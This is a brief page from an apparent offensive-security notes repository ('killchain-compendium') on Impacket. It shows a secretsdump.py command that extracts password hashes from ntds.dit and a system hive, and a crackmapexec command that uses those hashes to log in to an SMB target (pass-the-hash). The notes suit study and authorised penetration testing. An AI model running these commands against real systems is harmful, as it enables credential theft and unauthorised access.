whx
/
killchain-compendium
1
0
Fork 0
Code Issues Pull Requests Projects Releases Wiki Activity
killchain-compendium/Exploits/Windows/Impacket.md

365 B
Raw Blame History

Impacket

Secretsdump

  • ntds.dit and system.hive are needed
secretsdump.py -system system.hive -ntds ntds.dit -hashes lmhash:nthash LOCAL -outputfile hashes.txt
  • Remove everything but the hashes
  • Use it to log in on the target
crackmapexec smb $TARGET_IP -u <user> -H hashes.txt